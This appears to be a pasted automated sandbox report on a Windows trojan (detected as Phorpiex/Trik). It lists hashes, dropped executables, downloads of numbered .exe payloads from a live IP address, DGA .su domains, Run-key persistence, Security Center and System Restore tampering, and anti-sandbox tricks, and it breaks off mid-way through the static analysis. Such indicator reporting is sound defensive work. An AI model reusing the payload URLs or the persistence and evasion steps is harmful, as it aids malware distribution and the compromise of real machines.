Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "Exes_606ac88c.1"
- [*] File Size: 253440
- [*] File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
- [*] SHA256: "f06bc76647c37e85b60aec384eba21a56a3dc2ddb0b962536b05f1b827fee8b1"
- [*] MD5: "230ad5935436cf709dc1e06a6229c3b3"
- [*] SHA1: "0c4a87cbdd0cb833e574d7ddec41b59b83b3d554"
- [*] SHA512: "5d5ba9ad69f093475fddb2cefe365d86267d8eacb402e0ac3e6180cf96722f6a5938caa9fec79064ddce452b01838b730ea2b65d23f10e2209d6f26c92a3775e"
- [*] CRC32: "606AC88C"
- [*] SSDEEP: "6144:vR40u42cHaIKQ0xNuaDD4b7OeHMDzCTf:vRs5c6JxNuoTCT"
- [*] Process Execution: [
- "Exes_606ac88c.1",
- "winnjdu.exe",
- "1103737371.exe",
- "3251136198.exe",
- "wingzfw.exe",
- "2451410298.exe",
- "2940639086.exe",
- "4227421410.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
- "Details": []
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe"
- },
- {
- "binary": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
- },
- {
- "binary": "C:\\Windows\\3007640516827661\\wingzfw.exe"
- }
- ]
- },
- {
- "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
- "Details": [
- {
- "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "suspicious_request": "http://193.32.161.77/1.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/2.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/3.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/4.exe"
- },
- {
- "suspicious_request": "http://193.32.161.77/5.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://193.32.161.77/tldr.php?new=1"
- },
- {
- "url": "http://193.32.161.77/tldr.php?on=1"
- },
- {
- "url": "http://193.32.161.77/1.exe"
- },
- {
- "url": "http://193.32.161.77/2.exe"
- },
- {
- "url": "http://193.32.161.77/3.exe"
- },
- {
- "url": "http://193.32.161.77/4.exe"
- },
- {
- "url": "http://193.32.161.77/5.exe"
- }
- ]
- },
- {
- "Description": "Detects Sandboxie through the presence of a library",
- "Details": []
- },
- {
- "Description": "Detects SunBelt Sandbox through the presence of a library",
- "Details": []
- },
- {
- "Description": "Attempts to remove evidence of file being downloaded from the Internet",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "3251136198.exe (1720) called API GlobalMemoryStatus 2165386 times"
- },
- {
- "Spam": "4227421410.exe (2972) called API GlobalMemoryStatus 574213 times"
- },
- {
- "Spam": "wingzfw.exe (596) called API GlobalMemoryStatus 2165386 times"
- }
- ]
- },
- {
- "Description": "Installs itself for autorun at Windows startup",
- "Details": [
- {
- "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "key": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services"
- },
- {
- "data": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Windows\\2018222015062149"
- },
- {
- "file": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt"
- }
- ]
- },
- {
- "Description": "File has been identified by 43 Antiviruses on VirusTotal as malicious",
- "Details": [
- {
- "MicroWorld-eScan": "Trojan.GenericKD.32053517"
- },
- {
- "FireEye": "Generic.mg.230ad5935436cf70"
- },
- {
- "McAfee": "Trojan-FQYR!230AD5935436"
- },
- {
- "Cylance": "Unsafe"
- },
- {
- "AegisLab": "Trojan.Win32.Trik.4!c"
- },
- {
- "Alibaba": "TrojanDownloader:Win32/Trik.46992fc6"
- },
- {
- "K7GW": "Riskware ( 0040eff71 )"
- },
- {
- "Symantec": "Trojan.Gen.2"
- },
- {
- "APEX": "Malicious"
- },
- {
- "Paloalto": "generic.ml"
- },
- {
- "Kaspersky": "Trojan-Downloader.Win32.Trik.fo"
- },
- {
- "BitDefender": "Trojan.GenericKD.32053517"
- },
- {
- "Avast": "Win32:CrypterX-gen [Trj]"
- },
- {
- "Rising": "Worm.Phorpiex!8.48D (CLOUD)"
- },
- {
- "Endgame": "malicious (moderate confidence)"
- },
- {
- "Sophos": "Mal/Generic-S"
- },
- {
- "Comodo": "Malware@#4velj06b5762"
- },
- {
- "F-Secure": "Trojan.TR/AD.Phorpiex.uirrr"
- },
- {
- "TrendMicro": "TROJ_GEN.R011C0GFD19"
- },
- {
- "McAfee-GW-Edition": "BehavesLike.Win32.MultiPlug.dh"
- },
- {
- "Trapmine": "malicious.high.ml.score"
- },
- {
- "Emsisoft": "Trojan.GenericKD.32053517 (B)"
- },
- {
- "SentinelOne": "DFI - Suspicious PE"
- },
- {
- "Cyren": "W32/Trojan.MOZI-2355"
- },
- {
- "ESET-NOD32": "a variant of Win32/Kryptik.GTXN"
- },
- {
- "Webroot": "W32.Trojan.Gen"
- },
- {
- "Avira": "TR/AD.Phorpiex.uirrr"
- },
- {
- "Fortinet": "W32/Kryptik.GTVG!tr"
- },
- {
- "Microsoft": "Worm:Win32/Phorpiex.AF!bit"
- },
- {
- "Arcabit": "Trojan.Generic.D1E9190D"
- },
- {
- "ZoneAlarm": "Trojan-Downloader.Win32.Trik.fo"
- },
- {
- "GData": "Trojan.GenericKD.32053517"
- },
- {
- "AhnLab-V3": "Malware/Win32.Generic.C3288358"
- },
- {
- "Acronis": "suspicious"
- },
- {
- "ALYac": "Trojan.GenericKD.32053517"
- },
- {
- "VBA32": "BScope.Trojan.AET.281105"
- },
- {
- "Malwarebytes": "Trojan.MalPack.GS"
- },
- {
- "TrendMicro-HouseCall": "TROJ_GEN.R011C0GFD19"
- },
- {
- "Ikarus": "Trojan.Win32.Krypt"
- },
- {
- "Ad-Aware": "Trojan.GenericKD.32053517"
- },
- {
- "AVG": "Win32:CrypterX-gen [Trj]"
- },
- {
- "Panda": "Trj/GdSda.A"
- },
- {
- "CrowdStrike": "win/malicious_confidence_70% (W)"
- }
- ]
- },
- {
- "Description": "Operates on local firewall's policies and settings",
- "Details": []
- },
- {
- "Description": "Creates a copy of itself",
- "Details": [
- {
- "copy": "C:\\Windows\\2018222015062149\\winnjdu.exe"
- },
- {
- "copy": "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe"
- }
- ]
- },
- {
- "Description": "Attempts to disable System Restore",
- "Details": []
- },
- {
- "Description": "Attempts to modify or disable Security Center warnings",
- "Details": []
- },
- {
- "Description": "Likely use of Domain Generation Algorithm (DGA)",
- "Details": []
- },
- {
- "Description": "Attempts to interact with an Alternate Data Stream (ADS)",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier"
- },
- {
- "file": "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier"
- }
- ]
- },
- {
- "Description": "Anomalous binary characteristics",
- "Details": [
- {
- "anomaly": "Found duplicated section names"
- }
- ]
- },
- {
- "Description": "Created network traffic indicative of malicious activity",
- "Details": [
- {
- "signature": "ET DROP Dshield Block Listed Source group 1"
- },
- {
- "signature": "ET TROJAN Single char EXE direct download likely trojan (multiple families)"
- },
- {
- "signature": "ET DNS Query for .su TLD (Soviet Union) Often Malware Related"
- }
- ]
- }
- ]
- [*] Started Service: []
- [*] Executed Commands: [
- "C:\\Windows\\2018222015062149\\winnjdu.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe"
- ]
- [*] Mutexes: [
- "976857468"
- ]
- [*] Modified Files: [
- "C:\\Windows\\2018222015062149\\winnjdu.exe",
- "C:\\Users\\user\\AppData\\Roaming\\winsvcs.txt",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe",
- "C:\\Users\\user\\AppData\\Local\\Temp\\4227421410.exe"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\Exes_606ac88c.1:Zone.Iduentifier",
- "C:\\Windows\\2018222015062149\\winnjdu.exe:Zone.Iduentifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\1103737371.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\3251136198.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2451410298.exe:Zone.Identifier",
- "C:\\Users\\user\\AppData\\Local\\Temp\\2940639086.exe:Zone.Identifier"
- ]
- [*] Modified Registry Keys: [
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Microsoft Windows Services",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallOverride",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AntiVirusDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\UpdatesDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\AutoUpdateDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Security Center\\FirewallDisableNotify",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\SystemRestore\\DisableSR"
- ]
- [*] Deleted Registry Keys: []
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "aiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "abaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "aeuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xeoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "xbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "teoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "tbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiheiufisd.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weoghehofu.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wniaeninie.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wiaeufaehe.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wieieieros.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "wbaeubuegs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weubeufubg.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "A",
- "request": "weuaueudgs.su",
- "answers": [
- {
- "data": "",
- "type": "NXDOMAIN"
- }
- ]
- },
- {
- "type": "MX",
- "request": "yahoo.com",
- "answers": [
- {
- "data": "mta5.am0.yahoodns.net",
- "type": "MX"
- },
- {
- "data": "mta7.am0.yahoodns.net",
- "type": "MX"
- },
- {
- "data": "mta6.am0.yahoodns.net",
- "type": "MX"
- }
- ]
- },
- {
- "type": "A",
- "request": "mta6.am0.yahoodns.net",
- "answers": [
- {
- "data": "67.195.228.94",
- "type": "A"
- },
- {
- "data": "66.218.85.139",
- "type": "A"
- },
- {
- "data": "74.6.137.64",
- "type": "A"
- },
- {
- "data": "98.137.159.27",
- "type": "A"
- },
- {
- "data": "98.137.159.26",
- "type": "A"
- },
- {
- "data": "98.137.159.25",
- "type": "A"
- },
- {
- "data": "66.218.85.52",
- "type": "A"
- },
- {
- "data": "67.195.228.110",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "92.242.140.2",
- "domain": "xiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teuaueudgs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wbaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "wniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tniaeninie.su"
- },
- {
- "ip": "74.6.137.64",
- "domain": "mta6.am0.yahoodns.net"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tbaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aiaeufaehe.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xeoghehofu.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "abaeubuegs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xbaeubuegs.su"
- },
- {
- "ip": "72.30.35.10",
- "domain": "yahoo.com"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tieieieros.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "aeuaueudgs.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "teubeufubg.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "xniaeninie.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "tiheiufisd.su"
- },
- {
- "ip": "92.242.140.2",
- "domain": "weuaueudgs.su"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?new=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?new=1",
- "data": "GET /tldr.php?new=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://193.32.161.77/tldr.php?on=1",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/tldr.php?on=1",
- "data": "GET /tldr.php?on=1 HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/1.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/1.exe",
- "data": "GET /1.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/2.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/2.exe",
- "data": "GET /2.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/3.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/3.exe",
- "data": "GET /3.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/4.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/4.exe",
- "data": "GET /4.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- },
- {
- "count": 2,
- "body": "",
- "uri": "http://193.32.161.77/5.exe",
- "user-agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0",
- "method": "GET",
- "host": "193.32.161.77",
- "version": "1.1",
- "path": "/5.exe",
- "data": "GET /5.exe HTTP/1.1\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko/20100101 Firefox/25.0\r\nHost: 193.32.161.77\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "ExitProcess",
- "address": "0x426000"
- },
- {
- "name": "DebugActiveProcessStop",
- "address": "0x426004"
- },
- {
- "name": "lstrcpynA",
- "address": "0x426008"
- },
- {
- "name": "UnlockFile",
- "address": "0x42600c"
- },
- {
- "name": "GetFileAttributesExA",
- "address": "0x426010"
- },
- {
- "name": "GetTickCount",
- "address": "0x426014"
- },
- {
- "name": "GetNumberFormatA",
- "address": "0x426018"
- },
- {
- "name": "GlobalAlloc",
- "address": "0x42601c"
- },
- {
- "name": "LoadLibraryW",
- "address": "0x426020"
- },
- {
- "name": "GetConsoleAliasExesLengthW",
- "address": "0x426024"
- },
- {
- "name": "GetBinaryTypeA",
- "address": "0x426028"
- },
- {
- "name": "lstrlenW",
- "address": "0x42602c"
- },
- {
- "name": "Module32First",
- "address": "0x426030"
- },
- {
- "name": "GetLastError",
- "address": "0x426034"
- },
- {
- "name": "GetProcAddress",
- "address": "0x426038"
- },
- {
- "name": "PeekConsoleInputW",
- "address": "0x42603c"
- },
- {
- "name": "WTSGetActiveConsoleSessionId",
- "address": "0x426040"
- },
- {
- "name": "VirtualProtect",
- "address": "0x426044"
- },
- {
- "name": "CreateToolhelp32Snapshot",
- "address": "0x426048"
- },
- {
- "name": "GetCPInfoExA",
- "address": "0x42604c"
- },
- {
- "name": "CloseHandle",
- "address": "0x426050"
- },
- {
- "name": "EncodePointer",
- "address": "0x426054"
- },
- {
- "name": "DecodePointer",
- "address": "0x426058"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x42605c"
- },
- {
- "name": "RaiseException",
- "address": "0x426060"
- },
- {
- "name": "RtlUnwind",
- "address": "0x426064"
- },
- {
- "name": "IsDebuggerPresent",
- "address": "0x426068"
- },
- {
- "name": "IsProcessorFeaturePresent",
- "address": "0x42606c"
- },
- {
- "name": "EnterCriticalSection",
- "address": "0x426070"
- },
- {
- "name": "LeaveCriticalSection",
- "address": "0x426074"
- },
- {
- "name": "FlushFileBuffers",
- "address": "0x426078"
- },
- {
- "name": "WriteFile",
- "address": "0x42607c"
- },
- {
- "name": "WideCharToMultiByte",
- "address": "0x426080"
- },
- {
- "name": "GetConsoleCP",
- "address": "0x426084"
- },
- {
- "name": "GetConsoleMode",
- "address": "0x426088"
- },
- {
- "name": "DeleteCriticalSection",
- "address": "0x42608c"
- },
- {
- "name": "FatalAppExitA",
- "address": "0x426090"
- },
- {
- "name": "GetModuleHandleExW",
- "address": "0x426094"
- },
- {
- "name": "AreFileApisANSI",
- "address": "0x426098"
- },
- {
- "name": "MultiByteToWideChar",
- "address": "0x42609c"
- },
- {
- "name": "HeapSize",
- "address": "0x4260a0"
- },
- {
- "name": "HeapFree",
- "address": "0x4260a4"
- },
- {
- "name": "HeapAlloc",
- "address": "0x4260a8"
- },
- {
- "name": "SetLastError",
- "address": "0x4260ac"
- },
- {
- "name": "GetCurrentThread",
- "address": "0x4260b0"
- },
- {
- "name": "GetCurrentThreadId",
- "address": "0x4260b4"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x4260b8"
- },
- {
- "name": "GetStdHandle",
- "address": "0x4260bc"
- },
- {
- "name": "GetFileType",
- "address": "0x4260c0"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x4260c4"
- },
- {
- "name": "GetModuleFileNameA",
- "address": "0x4260c8"
- },
- {
- "name": "GetModuleFileNameW",
- "address": "0x4260cc"
- },
- {
- "name": "QueryPerformanceCounter",
- "address": "0x4260d0"
- },
- {
- "name": "GetCurrentProcessId",
- "address": "0x4260d4"
- },
- {
- "name": "GetSystemTimeAsFileTime",
- "address": "0x4260d8"
- },
- {
- "name": "GetEnvironmentStringsW",
- "address": "0x4260dc"
- },
- {
- "name": "FreeEnvironmentStringsW",
- "address": "0x4260e0"
- },
- {
- "name": "UnhandledExceptionFilter",
- "address": "0x4260e4"
- },
- {
- "name": "SetUnhandledExceptionFilter",
- "address": "0x4260e8"
- },
- {
- "name": "InitializeCriticalSectionAndSpinCount",
- "address": "0x4260ec"
- },
- {
- "name": "CreateEventW",
- "address": "0x4260f0"
- },
- {
- "name": "Sleep",
- "address": "0x4260f4"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x4260f8"
- },
- {
- "name": "TerminateProcess",
- "address": "0x4260fc"
- },
- {
- "name": "TlsAlloc",
- "address": "0x426100"
- },
- {
- "name": "TlsGetValue",
- "address": "0x426104"
- },
- {
- "name": "TlsSetValue",
- "address": "0x426108"
- },
- {
- "name": "TlsFree",
- "address": "0x42610c"
- },
- {
- "name": "GetModuleHandleW",
- "address": "0x426110"
- },
- {
- "name": "CreateSemaphoreW",
- "address": "0x426114"
- },
- {
- "name": "SetStdHandle",
- "address": "0x426118"
- },
- {
- "name": "SetFilePointerEx",
- "address": "0x42611c"
- },
- {
- "name": "WriteConsoleW",
- "address": "0x426120"
- },
- {
- "name": "SetConsoleCtrlHandler",
- "address": "0x426124"
- },
- {
- "name": "FreeLibrary",
- "address": "0x426128"
- },
- {
- "name": "LoadLibraryExW",
- "address": "0x42612c"
- },
- {
- "name": "IsValidCodePage",
- "address": "0x426130"
- },
- {
- "name": "GetACP",
- "address": "0x426134"
- },
- {
- "name": "GetOEMCP",
- "address": "0x426138"
- },
- {
- "name": "GetCPInfo",
- "address": "0x42613c"
- },
- {
- "name": "HeapReAlloc",
- "address": "0x426140"
- },
- {
- "name": "GetDateFormatW",
- "address": "0x426144"
- },
- {
- "name": "GetTimeFormatW",
- "address": "0x426148"
- },
- {
- "name": "CompareStringW",
- "address": "0x42614c"
- },
- {
- "name": "LCMapStringW",
- "address": "0x426150"
- },
- {
- "name": "GetLocaleInfoW",
- "address": "0x426154"
- },
- {
- "name": "IsValidLocale",
- "address": "0x426158"
- },
- {
- "name": "GetUserDefaultLCID",
- "address": "0x42615c"
- },
- {
- "name": "EnumSystemLocalesW",
- "address": "0x426160"
- },
- {
- "name": "OutputDebugStringW",
- "address": "0x426164"
- },
- {
- "name": "GetStringTypeW",
- "address": "0x426168"
- },
- {
- "name": "CreateFileW",
- "address": "0x42616c"
- }
- ],
- "dll": "KERNEL32.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": "hozatejiz.exe",
- "actual_checksum": "0x00044ae0",
- "overlay": null,
- "imagebase": "0x00400000",
- "reported_checksum": "0x00044ae0",
- "icon_hash": null,
- "entrypoint": "0x00403a61",
- "timestamp": "2018-06-17 04:22:09",
- "osversion": "5.1",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00025000",
- "entropy": "6.72",
- "raw_address": "0x00000400",
- "virtual_size": "0x00024ebd",
- "characteristics_raw": "0x60000020"
- },
